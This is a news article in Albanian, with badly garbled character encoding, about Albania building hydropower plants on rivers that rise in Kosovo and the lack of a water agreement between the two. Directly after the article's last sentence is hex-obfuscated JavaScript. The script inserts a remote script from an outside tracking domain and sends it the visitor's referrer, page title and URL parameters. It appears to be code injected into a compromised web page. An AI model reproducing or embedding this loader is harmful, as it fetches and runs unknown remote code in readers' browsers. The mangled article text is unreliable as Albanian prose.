f.1105112010473_m

UjA�rat mund tA� prodhojnA� ngatA�rresa midis ShqipA�risA� e KosovA�s

Kryeministri i ShqipA�risA�, Sali Berisha, ka marrA� pjesA� tA� dielA�n nA� pA�rurimin e Hidrocentralit tA� Lapajve nA� zonA�n e BushtricA�s. Ky hidrocentral A�shtA� i ndA�rtuar nA� kanionin e GrykA�s sA� A�ajA�s, i shpallur si Monument i NatyrA�s Shqiptare nga Qeveria e ShqipA�risA�. NdA�rkohA� qA� lumi i Lapajve ku A�shtA� ndA�rtuar hidrocentrali e ka burimin nA� territorin e KosovA�s. Qeveria e ShqipA�risA� ka dhA�nA� edhe gjashtA� leje tA� tjera koncesionare pA�r ndA�rtim hidrocentralesh nA� lumin e Lapajve si dhe 13 leje pA�r ndA�rtim hidrocentralesh nA� njA� tjetA�r lumA� qA� e ka burimin nA� KosovA�, pikA�risht nA� lumenjtA� qA� vijnA� nga Orqusha dhe nga GlloboA�ica e Dragashit.

TA� tre lumenjtA� janA� tA� projektuar si ushqyes pA�r Hidrocentralin e Zhurit. NdA�rkohA� qA� Kosova dhe ShqipA�ria ende nuk ka nA�nshkruar ndonjA� marrA�veshje pA�r ujA�rat midis tyre, pA�rfshirA� edhe ato ndA�rkufitare, madje palA�t nuk janA� takuar as nA� nivele ekspertA�sh qA� nga tetori i vitit 2010.

Projekti i Hidrocentrali Lapaj shfrytA�zon ujA�rat e lumit tA� BushtricA�s i cili buron nA� pjesA�n e KosovA�s dhe ka njA� kapacitet tA� instaluar prej 13,62 MW, me njA� prodhim mesatar vjetor tA� energjisA� tA� vlerA�suar prej 49.865 MWh. Hidrocentrali ka nisur punA�n dhe nA� tA� prodhohet energji e mjaftueshme pA�r tA� mbuluar nevojat e mA� shumA� se 22.000 familjeve.

Por shkaku i mosarritjes sA� ndonjA� marrA�veshje pA�r ujA�rat mesa duket A�shtA� problemi i ndA�rtimit tA� HEC-it tA� Zhurit, ku ndA�rtimi i kA�tij hidrocentrali ishte vA�nA� nA� pikA�pyetje pas vendimeve tA� QeverisA� sA� ShqipA�risA� pA�r dhA�nien e lejeve pA�r ndA�rtimin e hidrocentraleve tA� vogla nA� pjesA�n e vet, por me ujA�rat qA� rrjedhin nga Kosova. Qeveria e ShqipA�risA� ka miratuar para tre vjetA�sh njA� kontratA� tA� MinistrisA� sA� EkonomisA�, TregtisA� e EnergjetikA�s qA� kjo e fundit ka lidhur me njA� grup investitorA�sh shqiptarA� pA�r ndA�rtimin e 18 HEC-eve nA� zonA�n e KukA�sit mbi lumenjtA� qA� burimin e kanA� nA� KosovA� dhe shA�rbejnA� si ushqyesi kryesor pA�r kA�to hidrocentrale, por edhe pA�r Hidrocentralin e Zhurit. NdA�rtimi i 18 HEC-eve do tA� prodhojA� rreth 80 mega energji elektrike.

NjA�ri prej tyre A�shtA� pA�ruruar tA� dielA�n , ndA�rsa shumA� prej tyre kanA� hyrA� nA� fazA�n intensive tA� ndA�rtimit , pavarA�sisht kundA�rshtive nga komuniteti dhe shoqatat mjedisore, por edhe pa ndonjA� marrA�veshje me KosovA�n pA�r ujA�rat. Referuar pikA�risht ndA�rtimit tA� Hidrocentralit tA� Zhurit kryeministri i ShqipA�risA� Sali Berisha u ka bA�rA� thirrje palA�ve qA� tA� hyjnA� nA� bisedime tregtare, nA� tA� kundA�rt do tA� jetA� njA� gjykatA� ndA�rkombA�tare qA� do tA� zgjidhA� konfliktin. a�?KompanitA� duhet tA� hyjnA� nA� bisedime pA�r marrA�veshje tregtare mes njA�ri-tjetrit. NA� rast tA� mosmarrA�veshjeve ato duhet ta��i drejtohen gjykatA�s ndA�rkombA�tare pA�r zgjidhjen e konfliktit pA�r ujA�rat. A�shtA� gjykata qA� do e zgjidhA� problemin a�?, nA�nvizoi Berisha.

Heqja nga fjalori e HEC-it tA� Zhurit prej mA� shumA� se njA� viti nga zyrtarA�t nA� KosovA� ka bA�rA� qA� nA� pjesA�n e ShqipA�risA� tA� vazhdojA� puna pA�r ndA�rtimin e HEC-eve duke a�?shkrirA�a�? njA�herA�sh edhe lejet e a�?ngriraa�?, ndA�rkohA� qA� janA� dhA�nA� edhe gjashtA� leje tA� tjera njA� kompanie italiane pA�r ndA�rtimin e gjashtA� HEC-eve tA� tjerA� nA� GrykA�n e A�ajA�s, ku ujA�rat qA� pA�rshkojnA� ketA� grykA� e kanA� burimin nA� KosovA�.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}